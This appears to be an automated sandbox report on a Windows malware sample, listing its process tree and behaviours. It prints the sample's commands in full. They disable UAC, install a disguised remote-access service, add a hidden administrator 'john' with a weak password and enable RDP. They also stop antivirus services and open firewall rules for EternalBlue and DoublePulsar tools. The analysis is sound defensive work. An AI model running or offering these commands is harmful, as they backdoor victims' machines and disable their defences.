LtHv0O2KZDK4M637.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" LtHv0O2KZDK4M637.exe -
Views/modifies file attributes 1 TTPs 31 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 2404 attrib.exe 5992 attrib.exe 5972 attrib.exe 5204 attrib.exe 5164 attrib.exe 5696 attrib.exe 5236 attrib.exe 3540 attrib.exe 6068 attrib.exe 5644 attrib.exe 6028 attrib.exe 5784 attrib.exe 1816 attrib.exe 1444 attrib.exe 4164 attrib.exe 4032 attrib.exe 5360 attrib.exe 5448 attrib.exe 5648 attrib.exe 5368 attrib.exe 5304 attrib.exe 2164 attrib.exe 4600 attrib.exe 4160 attrib.exe 4008 attrib.exe 5440 attrib.exe 3792 attrib.exe 5548 attrib.exe 4276 attrib.exe 5284 attrib.exe 4968 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 2
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
-
C:\Windows\SysWOW64\timeout.exetimeout 5
- Delays execution with timeout.exe
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exe
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 3
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force
-
C:\Windows\system32\gpupdate.exegpupdate /force
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 3
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 1251
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 2
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add
-
C:\Windows\SysWOW64\chcp.comchcp 1251
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 2
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc
-
C:\Windows\SysWOW64\sc.exesc start appidsvc
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt
-
C:\Windows\SysWOW64\sc.exesc start appmgmt
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv
-
C:\Windows\SysWOW64\sc.exesc delete swprv
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_64
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
-
